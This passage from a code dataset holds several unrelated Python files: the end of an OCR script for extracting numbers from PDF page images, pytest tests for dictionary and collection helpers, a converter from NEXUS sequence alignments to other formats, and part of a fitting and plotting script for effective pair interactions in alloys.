検出した直線に赤線を引く\n red_lines_img = cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 1)\n print('\\n【直線検出部位の視覚化】')\n print(' 赤色部分が検出できた直線。')\n # plt.imshow(cv2.cvtColor(red_lines_img, cv2.COLOR_BGR2RGB))\n # plt.show()\n\n for line in lines:\n x1, y1, x2, y2 = line[0]\n # 検出した直線を消す(白で線を引く):2値化した際に黒で表示される\n no_lines_img = cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 1)\n\n print('\\n【直線検出部位の削除結果:元の画像から削除】')\n print(' 白色部分が検出した直線を消した場所(背景が白の場合は区別できません)。')\n # plt.imshow(cv2.cvtColor(no_lines_img, cv2.COLOR_BGR2RGB))\n # plt.show()\n\n\n image2 = Image.fromarray(no_lines_img)\n\n\n # 読み込んだページのテキストを抽出\n # print(extract_text(page))\n #文字と座標を読み取る\n\n # tesseract_layout=No\n # No の意味\n # 0 オリエンテーションとスクリプト検出(OSD)のみ。\n # 1 自動ページ分割とOSD。\n # 2 自動ページ分割、ただしOSD、またはOCRはなし。(未実装)\n # 3 完全自動ページ分割、ただしOSDなし。(初期設定)\n # 4 サイズの異なるテキストが1列に並んでいると仮定します。\n # 5 縦書きの一様なテキストブロックを想定しています。\n # 6 一様なテキストブロックを想定しています。\n # 7 画像を1つのテキスト行として扱う。\n # 8 画像を1つの単語として扱う。\n # 9 画像を円内の単一単語として扱う。\n # 10 画像を1つの文字として扱う。\n # 11 疎なテキスト。できるだけ多くのテキストを順不同に探します。\n # 12 OSDでテキストを疎にする。\n # 13 生の行。画像を1つのテキスト行として扱います。\n\n # box_builder = pyocr.builders.WordBoxBuilder(tesseract_layout=11)\n box_builder = pyocr.builders.WordBoxBuilder()\n text_position = tool.image_to_string(image2,lang=\"eng\",builder=box_builder)\n\n #取得した座標と文字を出力するし、画像に枠を書き込む/\\©\n img2 = np.array(image)\n t0 = \"\"\n p0 = [0,0]\n p1 = [0,0]\n flag = False\n limit = 0.95\n box_builder2 = pyocr.builders.WordBoxBuilder(tesseract_layout=7)\n \n Contents = []\n Positions = []\n PointN = 0\n for res in text_position:\n m = res.content\n x = res.position\n print(m)\n\n m = m.replace(\",\",\".\").replace(\"@\",\"0.\").replace(\"/\",\"\").replace(\"\\\\\",\"\").replace(\"©\",\"0.\").replace(\"Q\",\"0\")\n m = m.replace(\"Q\",\"0\").replace(\"U\",\"0\").replace(\"P\",\"0\").replace(' ', '').replace('ha', '42').replace('eo', '70').replace('oe', '0.')\n m = m.replace(\"o\",\"\").replace(\"-\",\"\").replace(\"«\",\"\")\n if m == \"(0\" or m == \"0\":\n m = m + \".\"\n if m == \"(0.\" or m == \"0.\":\n t0 = m\n p0 = res.position[0]\n flag = True\n else:\n t = t0 + m\n t0 = \"\"\n\n if flag == False:\n p0 = res.position[0]\n p1 = res.position[1]\n flag = False\n\n if re.search(r'\\d', t):\n # print(m)\n # print(res.position)\n if isfloat(t.replace(\"(\",\"\").replace(\")\",\"\")):\n a = float(t.replace(\"(\",\"\").replace(\")\",\"\"))\n print(a)\n if a >= limit and a < 1.0 :\n PointN += 1\n Contents.append(a)\n Positions.append([list(p0),list(p1)])\n \n elif a >= 1 and a <= 99:\n b = a / 100.0\n if b >= limit and b < 1.0 :\n p02 = list(p0)\n p12 = list(p1)\n p02[0] = p02[0]- int((p12[0]-p02[0])*1.4)\n p0 = tuple(p02)\n PointN += 1\n Contents.append(a)\n Positions.append([list(p0),list(p1)])\n \n # plt.imshow(cv2.cvtColor(img2, cv2.COLOR_BGR2RGB))\n # plt.show()\n\n box_builder2 = pyocr.builders.TextBuilder(tesseract_layout=7)\n Positions2 = []\n PointN2 = 0\n Contents2 = []\n for P in Positions:\n\n img3 = img2[P[0][1]-5:P[1][1]+5,P[0][0]-5:P[1][0]+5]\n \n # plt.imshow(cv2.cvtColor(img3, cv2.COLOR_BGR2RGB))\n # plt.show()\n image3 = Image.fromarray(img3)\n \n t = tool.image_to_string(image3,lang=\"eng\",builder=box_builder2)\n print(\"?:\" + t)\n t = t.replace(\",\",\".\").replace(\"@\",\"0.\").replace(\"/\",\"\").replace(\"\\\\\",\"\").replace(\"©\",\"0.\").replace(\"Q\",\"0\")\n t = t.replace(\"Q\",\"0\").replace(\"U\",\"0\").replace(\"P\",\"0\").replace(' ', '').replace('ha', '42').replace('eo', '70').replace('oe', '0.')\n t = t.replace(\"o\",\"\").replace(\"-\",\"\").replace(\"«\",\"\")\n \n if re.search(r'\\d', t):\n # print(m)\n # print(res.position)\n if isfloat(t.replace(\"(\",\"\").replace(\")\",\"\")):\n a = float(t.replace(\"(\",\"\").replace(\")\",\"\"))\n print(a)\n if a >= limit and a < 1.0 :\n PointN2 += 1\n Contents2.append(a)\n Positions2.append(P)\n \n elif a >= 1 and a <= 99:\n b = a / 100.0\n if b >= limit and b < 1.0 :\n PointN2 += 1\n Contents2.append(a)\n Positions2.append(P)\n \n print(Contents2)\n Total_Contents.append(Contents2)\n Total_Positions.append(Positions2)\n Total_PointN.append(PointN2)\n\ni = 0\nfor image in Out_image2:\n if Total_PointN[i] > 0:\n img2 = np.array(image)\n t1 = \"[ N = \" + str(Total_PointN[i]) + \" ]\"\n cv2.putText(img2, t1, (Tx, Ty), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 2, cv2.LINE_AA)\n Position = Total_Positions[i]\n for P in Position:\n P0 = [int(P[0][0]/Cdpi) - LineW*2,int(P[0][1]/Cdpi) - LineW*2]\n P1 = [int(P[1][0]/Cdpi) + LineW,int(P[1][1]/Cdpi) + LineW]\n cv2.rectangle(img2,tuple(P0),tuple(P1),(255,0,0),LineW)\n\n pil_image = Image.fromarray(img2)\n im_pdf = pil_image.convert(\"RGB\")\n fname = \"P\"+str(no)+ \".pdf\"\n # im_pdf.save(r\"test.pdf\")\n im_pdf.save(fname)\n pdf_file_merger.append(fname)\n os.remove(fname)\n\n i += 1\n\n\n\npdf_file_merger.write('test2.pdf')\npdf_file_merger.close()\n\n","repo_name":"tkanyama/PdfAutoOCR","sub_path":"PdfAutoOCR2.py","file_name":"PdfAutoOCR2.py","file_ext":"py","file_size_in_byte":13744,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35855280115","text":"# -*- coding: utf-8 -*-\n\nimport tempfile\nfrom contextlib import ExitStack\n\nimport pytest\nimport yaml\n\nfrom ktz.collections import (Incrementer, buckets, dconv, dflat, dmerge, drslv,\n lflat, ryaml, unbucket)\n\n\nclass TestBuckets:\n\n #\n # without key and without mapper\n #\n def test_buckets_simple(self):\n ref = {1: [2], 3: [4]}\n ret = buckets(((1, 2), (3, 4)))\n assert ret == ref\n\n def test_buckets_multiple(self):\n ref = {1: [2, 3, 4], 5: [6, 7]}\n ret = buckets(((1, 2), (1, 3), (1, 4), (5, 6), (5, 7)))\n assert ret == ref\n\n #\n # with key and without mapper\n #\n def test_buckets_key(self):\n ref = {0: [0, 2, 4], 1: [1, 3, 5]}\n ret = buckets(range(6), key=lambda _, x: (x % 2, x))\n assert ret == ref\n\n def test_buckets_index(self):\n ref = {1: [0], 2: [1], 3: [2]}\n ret = buckets(range(3), key=lambda i, x: (i + 1, x))\n assert ret == ref\n\n #\n # without key and with mapper\n #\n def test_buckets_mapper(self):\n ref = {1: 9, 5: 13}\n ret = buckets(\n ((1, 2), (1, 3), (1, 4), (5, 6), (5, 7)),\n mapper=sum,\n )\n assert ref == ret\n\n #\n # with key and with mapper\n #\n def test_buckets_key_mapper(self):\n ref = {0: 6, 1: 9}\n ret = buckets(\n range(6),\n key=lambda _, x: (x % 2, x),\n mapper=sum,\n )\n\n assert ret == ref\n\n\nclass TestUnbucket:\n def test_unbucket(self):\n ref = [(1, 2), (5, 6), (5, 7)]\n ret = unbucket({1: [2], 5: [6, 7]})\n assert ret == ref\n\n\nclass TestLFlat:\n def test_lflat(self):\n ref = 1, 2\n ret = lflat([[[1]], [2]])\n assert tuple(ret) == ref\n\n def test_lflat_depth_1(self):\n ref = [1], 2\n ret = lflat([[1], 2], depth=1)\n assert tuple(ret) == ref\n\n def test_lflat_depth_2(self):\n ref = 1, [2]\n ret = lflat([[1], [[2]]], depth=2)\n assert tuple(ret) == ref\n\n def test_lflat_str(self):\n ref = \"foo\", \"bar\"\n ret = lflat([[[\"foo\"]], [\"bar\"]])\n assert tuple(ret) == ref\n\n def test_lflat_tuple(self):\n ref = \"foo\", \"bar\"\n ret = lflat((((\"foo\")), (\"bar\")))\n assert tuple(ret) == ref\n\n\nclass TestIncrementer:\n def test_increment_default(self):\n incr = Incrementer()\n assert incr[\"a\"] == 0\n assert incr[\"b\"] == 1\n assert incr[\"a\"] == 0\n assert incr[\"c\"] == 2\n\n def test_increment_fn_iterable(self):\n incr = Incrementer(fn=range(10, 100))\n\n assert incr[\"a\"] == 10\n assert incr[\"b\"] == 11\n assert incr[\"a\"] == 10\n assert incr[\"c\"] == 12\n\n def test_increment_fn_iterator(self):\n incr = Incrementer(fn=iter(range(10, 100)))\n\n assert incr[\"a\"] == 10\n assert incr[\"b\"] == 11\n assert incr[\"a\"] == 10\n assert incr[\"c\"] == 12\n\n def test_increment_setitem(self):\n incr = Incrementer()\n with pytest.raises(KeyError):\n incr[\"foo\"] = 3\n\n def test_increment_freeze_unfreeze(self):\n incr = Incrementer()\n assert incr[\"a\"] == 0\n\n incr.freeze()\n with pytest.raises(NameError):\n incr[\"b\"]\n\n incr.unfreeze()\n assert incr[\"b\"] == 1\n\n\nclass TestDMerge:\n def test_flat(self):\n d1 = dict(foo=1, bar=2)\n d2 = dict(foo=3, xyz=4)\n\n res = dmerge(d1, d2)\n assert res == dict(foo=3, bar=2, xyz=4)\n\n def test_none(self):\n d1 = dict(foo=1, bar=2)\n d2 = dict(foo=None, xyz=4)\n\n res = dmerge(d1, d2)\n assert res == dict(foo=1, bar=2, xyz=4)\n\n def test_empty(self):\n res = dmerge()\n assert res == {}\n\n def test_deep(self):\n d1 = dict(foo=dict(a=1, b=2), bar=3)\n d2 = dict(foo=dict(a=3, c=4), xyz=5)\n\n res = dmerge(d1, d2)\n assert res == dict(foo=dict(a=3, b=2, c=4), bar=3, xyz=5)\n\n def test_multiple(self):\n d1 = dict(foo=1, d1=1)\n d2 = dict(foo=3, xyz=4, d2=2)\n d3 = dict(foo=5, xyz=6, d3=3)\n\n res = dmerge(d1, d2, d3)\n assert res == dict(foo=5, xyz=6, d1=1, d2=2, d3=3)\n\n\nclass TestDFlat:\n def test_empty(self):\n res = dflat({})\n assert res == {}\n\n def test_simple(self):\n res = dflat(dict(foo=1, bar=2))\n assert res == dict(foo=1, bar=2)\n\n def test_deep(self):\n d = {\n \"1\": {\n \"1\": {\n \"1\": \"1.1.1\",\n \"2\": \"1.1.2\",\n },\n \"2\": {\n \"1\": \"1.2.1\",\n },\n },\n \"2\": {\n \"1\": \"2.1\",\n },\n }\n\n res = dflat(d)\n assert res == {\n \"1.1.1\": \"1.1.1\",\n \"1.1.2\": \"1.1.2\",\n \"1.2.1\": \"1.2.1\",\n \"2.1\": \"2.1\",\n }\n\n def test_only(self):\n d = {\n \"1\": {\n \"1\": {\n \"1\": \"1.1.1\",\n \"2\": \"1.1.2\",\n },\n \"2\": {\n \"1\": \"1.2.1\",\n },\n },\n \"2\": {\n \"1\": \"2.1\",\n },\n }\n\n res = dflat(d, only=2)\n assert res == {\n \"1.1\": {\"1\": \"1.1.1\", \"2\": \"1.1.2\"},\n \"1.2\": {\"1\": \"1.2.1\"},\n \"2.1\": \"2.1\",\n }\n\n def test_sep(self):\n d = {\"1\": {\"1\": \"1.1\"}}\n res = dflat(d, sep=\" \")\n assert res == {\"1 1\": \"1.1\"}\n\n def test_dict_leaves(self):\n d = {\"1\": {}, \"2\": {\"1\": {}, \"2\": {}}}\n res = dflat(d)\n assert res == {\"1\": {}, \"2.1\": {}, \"2.2\": {}}\n\n # TODO release 0.3\n # def test_skiplast(self):\n # d = {\n # \"1\": {\n # \"1\": {\n # \"1\": \"1.1.1\",\n # \"2\": \"1.1.2\",\n # },\n # \"2\": {\n # \"1\": \"1.2.1\",\n # },\n # },\n # \"2\": {\n # \"1\": \"2.1\",\n # },\n # }\n\n # res = dflat(d, skiplast=0)\n # assert res == dflat(d)\n\n # res = dflat(d, skiplast=1)\n # assert res == {\n # \"1.1\": {\n # \"1\": \"1.1.1\",\n # \"2\": \"1.1.2\",\n # },\n # \"1.2\": {\n # \"1\": \"1.2.1\",\n # },\n # \"2.1\": \"2.1\",\n # }\n\n # res = dflat(d, skiplast=2)\n # assert res == d\n\n\nclass TestDrslv:\n def test_empty_dic(self):\n d = {}\n\n # defaults to a key error\n with pytest.raises(KeyError):\n drslv(d, \"foo\")\n\n res = drslv(d, \"foo\", default=None)\n assert res is None\n\n def test_small(self):\n d = dict(foo=dict(bar=\"deep\"), flat=\"flat\")\n\n res = drslv(d, \"flat\")\n assert res == \"flat\"\n\n res = drslv(d, \"foo.bar\")\n assert res == \"deep\"\n\n def test_too_deep(self):\n d = dict(foo=dict(bar=\"deep\"), flat=\"flat\")\n\n with pytest.raises(KeyError):\n drslv(d, \"foo.bar.baz\")\n\n def test_sep(self):\n d = dict(foo=dict(bar=\"deep\"), flat=\"flat\")\n\n res = drslv(d, \"foo bar\", sep=\" \")\n assert res == \"deep\"\n\n def test_collapse(self):\n d = {\n \"1\": {\n \"1\": {\n \"1\": \"1.1.1\",\n \"2\": \"1.1.2\",\n },\n \"2\": {\n \"1\": \"1.2.1\",\n },\n },\n }\n\n res = drslv(d, \"1.1.1\")\n assert res == \"1.1.1\"\n\n res = drslv(d, \"1.1.1\", collapse=1)\n assert res == {\"1\": \"1.1.1\", \"2\": \"1.1.2\"}\n\n res = drslv(d, \"1.1.1\", collapse=2)\n assert res == {\"1\": {\"1\": \"1.1.1\", \"2\": \"1.1.2\"}, \"2\": {\"1\": \"1.2.1\"}}\n\n res = drslv(d, \"1.1\", collapse=1)\n assert res == {\"1\": {\"1\": \"1.1.1\", \"2\": \"1.1.2\"}, \"2\": {\"1\": \"1.2.1\"}}\n\n with pytest.raises(KeyError):\n drslv(d, \"1.1.3\", collapse=2)\n\n def test_deprecated_skiplast(self):\n d = {\"1\": {\"1\": {\"1\": \"1.1.1\", \"2\": \"1.1.2\"}}}\n\n # skiplast\n with pytest.deprecated_call():\n res = drslv(d, \"1.1.1\", skiplast=1)\n assert res == {\"1\": \"1.1.1\", \"2\": \"1.1.2\"}\n\n def test_wildcard(self):\n d = dict(a=dict(foo=dict(b=3)))\n assert drslv(d, \"a.*.b\") == 3\n\n def test_wildcard_error(self):\n d = dict(a=dict(x=1), b=dict(y=1))\n with pytest.raises(KeyError):\n drslv(d, \"*.x\")\n\n\nclass TestDConv:\n def test_empty_dic(self):\n d1 = {}\n d2 = dconv(d1)\n\n assert d1 == d2\n assert d1 is not d2\n\n def test_single_fn(self):\n d1 = dict(a=2)\n d2 = dconv(d1, lambda t: str(t))\n assert d2 == dict(a=\"2\")\n\n def test_multiple_fn(self):\n def stoi(v):\n if isinstance(v, str):\n return int(v)\n return v\n\n def plus1(v):\n if isinstance(v, int):\n return v + 1\n return v\n\n d1 = dict(a=1, b=\"2\", c=[])\n d2 = dconv(d1, stoi, plus1)\n\n assert d2 == dict(a=2, b=3, c=[])\n\n def test_key(self):\n def fn(v, k):\n if k == \"foo\":\n return True\n return False\n\n d1 = dict(foo=1, bar=2)\n d2 = dconv(d1, fn)\n\n assert d2 == dict(foo=True, bar=False)\n\n def test_deep(self):\n d1 = dict(foo=1, bar=dict(a=2, b=3))\n d2 = dconv(d1, lambda v: v + 2)\n assert d2 == dict(foo=3, bar=dict(a=4, b=5))\n\n\nclass TestRyaml:\n def test_noargs(self):\n ret = ryaml()\n assert ret == {}\n\n def test_only_overwrites(self):\n ret = ryaml(foo=1)\n assert ret == dict(foo=1)\n\n def test_single(self):\n d1 = dict(foo=1, bar=2)\n\n with tempfile.NamedTemporaryFile(mode=\"w\") as fd:\n yaml.dump(d1, fd)\n ret = ryaml(fd.name)\n\n assert ret == d1\n\n def test_multi(self):\n d1 = dict(foo=1, bar=2)\n d2 = dict(foo=3, xyz=4)\n\n with ExitStack() as stack:\n fd1 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n fd2 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n\n yaml.dump(d1, fd1)\n yaml.dump(d2, fd2)\n\n ret = ryaml(fd1.name, fd2.name)\n\n assert ret == dict(foo=3, bar=2, xyz=4)\n\n def test_multi_deep(self):\n d1 = dict(foo=dict(a=1, b=2), bar=2)\n d2 = dict(foo=dict(a=3, c=4), xyz=5)\n\n with ExitStack() as stack:\n fd1 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n fd2 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n\n yaml.dump(d1, fd1)\n yaml.dump(d2, fd2)\n\n ret = ryaml(fd1.name, fd2.name)\n\n assert ret == dict(foo=dict(a=3, b=2, c=4), bar=2, xyz=5)\n\n def test_overwrites(self):\n d1 = dict(foo=1, bar=2)\n d2 = dict(foo=3, xyz=4)\n\n with ExitStack() as stack:\n fd1 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n fd2 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n\n yaml.dump(d1, fd1)\n yaml.dump(d2, fd2)\n\n ret = ryaml(fd1.name, fd2.name, xyz=5)\n\n assert ret == dict(foo=3, bar=2, xyz=5)\n\n def test_overwrites_deep(self):\n d1 = dict(foo=1, bar=2)\n d2 = dict(foo=3, xyz=dict(a=1, b=2))\n\n with ExitStack() as stack:\n fd1 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n fd2 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n\n yaml.dump(d1, fd1)\n yaml.dump(d2, fd2)\n\n ret = ryaml(fd1.name, fd2.name, xyz=dict(a=3, c=3))\n\n assert ret == dict(foo=3, bar=2, xyz=dict(a=3, b=2, c=3))\n","repo_name":"kantholtz/ktz","sub_path":"ktz/tests/test_collections.py","file_name":"test_collections.py","file_ext":"py","file_size_in_byte":11831,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"4846593038","text":"\nclass nexus_converter:\n\n def __init__(self,file,fast, out, concat):\n self.file = file\n self.input = fast\n self.output = out\n self.taxa = 0\n self.lenght = 0\n self.sequence = {}\n self.concat = concat\n self.b_taxa = \"\"\n self.nexus_rearrange()\n if self.output == 'fasta':\n self.nexus_to_fasta()\n elif self.output == 'phylip':\n self.nexus_to_phylip()\n elif self.output == 'aln' or self.output == 'clustal':\n self.nexus_to_aln_clustal()\n\n def nexus_rearrange(self):\n line = \"\"\n with open(self.file, \"r\") as nexus_file:\n while 'MATRIX' not in line:\n line = nexus_file.readline()\n line = nexus_file.readline()\n while ';' not in line:\n self.taxa +=1\n self.sequence[line.strip().split(' ')[0]] = line.strip().split(' ')[1]\n line = nexus_file.readline()\n self.lenght = len(sorted(self.sequence.values(), key=len)[-1])\n self.b_taxa = sorted(self.sequence.keys(), key=len)[-1]\n\n def nexus_to_fasta(self):\n if self.concat == 'yes':\n return self.sequence\n\n fasta = ''\n for k,v in self.sequence.items():\n fasta += \">{}\\n\".format(k)\n for start in range(0,self.lenght,60):\n fasta += \"{}\\n\".format(v[start:start+60])\n with open(self.file.replace('.nex','.fasta'), 'w+') as writ:\n writ.write(fasta)\n\n def nexus_to_phylip(self):\n if self.concat == 'yes':\n return self.sequence\n\n seq ='{} {} s\\n\\n'.format(self.taxa, self.lenght)\n for k,v in self.sequence.items():\n seq+=\"{}{} {}\\n\".format(\" \"*(len(self.b_taxa)-len(k)),k,v)\n\n with open(self.file.replace('.nex','.phy'), 'w+') as writ:\n writ.write(seq)\n\n def nexus_to_aln_clustal(self):\n if self.concat == 'yes':\n return self.sequence\n\n seq = 'CLUSTAL W:\\n\\n'\n for start in range(0,self.lenght,60):\n for k,v in self.sequence.items():\n seq += \"{}{} {}\\n\".format(\" \"*(len(self.b_taxa)-len(k)),k,v[start:start+60])\n seq+='\\n'\n\n with open(self.file.replace('.nex','.aln'),'w+') as writ:\n writ.write(seq)\n\n\n\n","repo_name":"Bioinformatics-side-projects/concatenator2","sub_path":"nexus_to_/class_nexus.py","file_name":"class_nexus.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"8895992614","text":"\n\nimport numpy as np \nimport os \n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nfrom myvasp import vasp_func as vf \n\nfrom myvasp import vasp_epi_res \n\n\n\n\n\n\n\n\n# EPI fitting, which follows E = X @ beta \nclass class_epi_fit:\n def __init__(self, lpairs, E):\n vf.confirm_0( len(lpairs.leta) - len(E), str1='wrong len(leta_res) ' )\n self.lpairs = lpairs\n self.E = E\n\n\n\n\n #-----------------------------\n \n def routine_1(self, sd, tt=0.8, dmax=5, islip='fcc_partial', dmax_max=11, fname_suffix=''):\n ntrain = np.around( len(self.lpairs.leta) * tt )\n print('ntrain:', ntrain) \n\n epi_res1 = self.calc_epi(dmax=dmax, ntrain=ntrain) \n epi_res1.save_epi_res(fname_suffix=fname_suffix) \n epi_res1.write_epi_res(fname_suffix=fname_suffix) \n\n print('==> scan ntrain')\n self.calc_epi(dmax=dmax, ntrain=ntrain, scan_ntrain=True, fname_suffix=fname_suffix) \n fname1 = 'lepi_res_ntrain_%s.pkl' %(fname_suffix)\n self.calc_sdUss_tilde(filename=fname1, islip = islip) \n self.plot_lepi_res_ntrain(filename=fname1) \n if fname_suffix == 'slip':\n self.plot_lepi_res_ntrain_2(filename=fname1, sd=sd) \n\n print('==> scan dmax')\n dmax_max = np.min([ self.lpairs.shellmax, dmax_max ])\n self.scan_dmax(dmax_range=np.arange(2, dmax_max), ntrain=ntrain, fname_suffix=fname_suffix) \n fname2 = 'lepi_res_dmax_%s.pkl' %(fname_suffix)\n self.calc_sdUss_tilde(filename=fname2, islip = islip) \n self.plot_lepi_res_dmax(filename=fname2) \n\n\n\n\n #=============================\n\n def calc_epi(self, dmax, ntrain, scan_ntrain=False, fname_suffix=''): \n X = self.lpairs.get_X(dmax) \n E = self.E.copy() \n\n if scan_ntrain == False:\n ntrain_range = np.array([ntrain]) \n else:\n temp = ( (self.lpairs.nelem+1) * self.lpairs.nelem -2) /2 * dmax \n ntrain_min = int( np.ceil( (temp+2)/10 )*10 )\n ntrain_range = np.arange(ntrain_min, ntrain+1) \n\n lepi_res = [] \n for i in ntrain_range:\n X_train, X_test = vf.split_train_test(X, i) \n E_train, E_test = vf.split_train_test(E, i) \n\n lstsq_res = np.linalg.lstsq(X_train, E_train, rcond=None) \n beta = lstsq_res[0] \n E_p = X @ beta # EPI predicted energy \n\n epi_res1 = vasp_epi_res.class_epi_res( self.lpairs.nelem, self.lpairs.r_shell, dmax, i, lstsq_res, X, E, E_p)\n lepi_res.append( epi_res1 )\n \n if scan_ntrain == False:\n return lepi_res[0]\n else:\n if fname_suffix != '':\n filename = 'lepi_res_ntrain_%s.pkl' %(fname_suffix) \n else:\n filename = 'lepi_res_ntrain.pkl' \n vf.my_save_pkl(lepi_res, filename)\n\n\n\n\n #=============================\n\n def scan_dmax(self, dmax_range, ntrain, fname_suffix=''):\n lepi_res = [] \n for dmax in dmax_range:\n epi_res1 = self.calc_epi(dmax, ntrain) \n lepi_res.append( epi_res1 )\n\n if fname_suffix != '':\n filename = 'lepi_res_dmax_%s.pkl' %(fname_suffix) \n else:\n filename = 'lepi_res_dmax.pkl' \n vf.my_save_pkl(lepi_res, filename)\n\n\n\n\n def calc_sdUss_tilde(self, filename, cn=np.array([1, 1]), islip='fcc_partial' ):\n from myalloy import main as myalloy_main\n a1 = myalloy_main.alloy_class(name='fcc_alloy', cn=cn, brav_latt='fcc')\n print('islip:', islip)\n\n lepi_res = vf.my_read_pkl(filename) \n sigma_dUss_tilde = np.array([]) \n\n for i in np.arange( len(lepi_res) ):\n a1.set_EPI( lepi_res[i].epi )\n temp = a1.calc_sigma_dUss_tilde(t = islip) \n sigma_dUss_tilde = np.append( sigma_dUss_tilde, temp ) \n\n filename2 = '%s.sdUss_tilde.txt' %(filename[0:-4])\n np.savetxt(filename2, sigma_dUss_tilde)\n\n\n\n\n #============================================\n # plot lepi_res - ntrain \n #============================================\n\n def plot_lepi_res_ntrain_2(self, filename, sd): \n lepi_res = vf.my_read_pkl(filename) \n \n Ntot = np.prod(sd)*6\n Ntot_m = Ntot / (sd[0] * sd[1])\n Ntot_s = Ntot / np.sqrt(sd[0]*2 * sd[1])\n \n dmax = np.array([])\n ntrain = np.array([])\n\n mE_train = np.array([])\n sE_train = np.array([])\n\n mE_p_train = np.array([])\n sE_p_train = np.array([])\n\n Vnm = np.zeros(lepi_res[0].dmax) # a specific pair nm \n\n for i in np.arange( len(lepi_res) ):\n dmax = np.append( dmax, lepi_res[i].dmax ) \n ntrain = np.append( ntrain, lepi_res[i].ntrain ) \n\n mE_train = np.append( mE_train, lepi_res[i].E_train.mean() ) \n sE_train = np.append( sE_train, lepi_res[i].E_train.std() ) \n\n mE_p_train = np.append( mE_p_train, lepi_res[i].E_p_train.mean() ) \n sE_p_train = np.append( sE_p_train, lepi_res[i].E_p_train.std() )\n \n Vnm = np.vstack([Vnm, lepi_res[i].epi[:,0,1]])\n Vnm=np.delete(Vnm, 0, 0) \n\n\n ax1 = create_ax1() \n fig_xlim = [0, ntrain[-1]]\n\n for j in np.arange(Vnm.shape[1]):\n str1 = '$d_{%d}$' %(j+1)\n ax1[0].plot( ntrain, Vnm[:,j], '-', label=str1 )\n ax1[0].plot( fig_xlim, [0, 0], '--', color='gray' ) \n\n\n ax1[1].plot( ntrain, mE_train *Ntot_m, '-', color='k', label='from atomistically computed energies ')\n ax1[1].plot( ntrain, mE_p_train *Ntot_m, '-', color='C3', label='from EPI-predicted energies')\n # ax1[1].plot( fig_xlim, [0, 0], '--', color='gray' ) \n\n\n ax1[2].plot( ntrain, sE_train *Ntot_s, '-', color='k', label='from atomistically computed energies ')\n ax1[2].plot( ntrain, sE_p_train *Ntot_s, '-', color='C3', label='from EPI-predicted energies')\n\n filename2 = '%s.sdUss_tilde.txt' %(filename[0:-4])\n if os.path.exists(filename2) :\n sigma_dUss_tilde = np.loadtxt(filename2) \n ax1[2].plot( ntrain, sigma_dUss_tilde, '-', color='C2', label='analytical $\\\\widetilde{\\\\sigma}_{\\\\Delta U_{s-s}}$')\n\n \n ax1[0].legend( fontsize=6, loc='lower left', ncol=2) \n ax1[1].legend( fontsize=6, loc='lower left' ) \n ax1[2].legend( fontsize=6, loc='lower left' ) \n\n ax1[2].set_xlim( fig_xlim )\n ax1[2].set_xlabel('$N_\\\\mathrm{train}$')\n\n ax1[0].set_ylim([-0.06, 0.04]) \n # ax1[1].set_ylim([-0.02, 0.02]) \n # ax1[2].set_ylim([0, 0.06]) \n\n ax1[0].set_ylabel('EPI $V_{\\\\mathrm{AuNi}, d}$ (eV)')\n ax1[1].set_ylabel('mean of $ E_\\\\mathrm{tot} /(N_1 N_2) $ (eV)')\n ax1[2].set_ylabel( 'std of $ E_\\\\mathrm{tot} /\\\\sqrt{2 N_1 N_2} $ (eV)') \n \n\n vf.confirm_0( dmax.std() )\n str1 = 'with $N_d = %d$' %( dmax[0] ) \n vf.my_text(ax1[0], str1, 0.5, 0.9, ha='center' )\n\n create_abc(ax1)\n\n figname = '%s_2.pdf' %(filename[0:-4])\n plt.savefig(figname)\n plt.close('all')\n\n\n\n\n def plot_lepi_res_ntrain(self, filename): \n lepi_res = vf.my_read_pkl(filename) \n \n dmax = np.array([])\n ntrain = np.array([])\n \n pe_train = np.array([])\n pe_test = np.array([])\n \n Vnm = np.zeros(lepi_res[0].dmax) # a specific pair nm \n \n for i in np.arange( len(lepi_res) ):\n dmax = np.append( dmax, lepi_res[i].dmax ) \n ntrain = np.append( ntrain, lepi_res[i].ntrain ) \n \n pe_train = np.append( pe_train, lepi_res[i].pe_train ) \n pe_test = np.append( pe_test, lepi_res[i].pe_test ) \n \n Vnm = np.vstack([Vnm, lepi_res[i].epi[:,0,1]])\n Vnm=np.delete(Vnm, 0, 0) \n \n \n ax1 = create_ax1() \n fig_xlim = [0, ntrain[-1]]\n\n for j in np.arange(Vnm.shape[1]):\n str1 = '$d_{%d}$' %(j+1)\n ax1[0].plot( ntrain, Vnm[:,j], '-', label=str1 )\n ax1[0].plot( fig_xlim, [0, 0], '--', color='gray' ) \n \n ax1[1].plot( ntrain, pe_train, '-', color='C0', label='training set')\n ax1[1].plot( ntrain, pe_test, '-', color='C1', label='testing set')\n \n filename2 = '%s.sdUss_tilde.txt' %(filename[0:-4])\n if os.path.exists(filename2) :\n sigma_dUss_tilde = np.loadtxt(filename2) \n ax1[2].plot( ntrain, sigma_dUss_tilde, '-', color='C2')\n \n\n ax1[0].legend( fontsize=6, loc='lower left', ncol=2) \n ax1[1].legend( fontsize=6, loc='lower left' ) \n # ax1[2].legend( fontsize=6, loc='lower left' ) \n\n ax1[2].set_xlim( fig_xlim )\n ax1[2].set_xlabel('$N_\\\\mathrm{train}$')\n\n ax1[0].set_ylim([-0.06, 0.04]) \n ax1[1].set_ylim([0, 1]) \n ax1[2].set_ylim([0, 0.06]) \n\n ax1[0].set_ylabel('EPI $V_{\\\\mathrm{AuNi}, d}$ (eV)')\n ax1[1].set_ylabel('percent error')\n ax1[2].set_ylabel('EPI-based $\\\\widetilde{\\\\sigma}_{\\\\Delta U_{s-s}}$ (eV)') \n\n\n 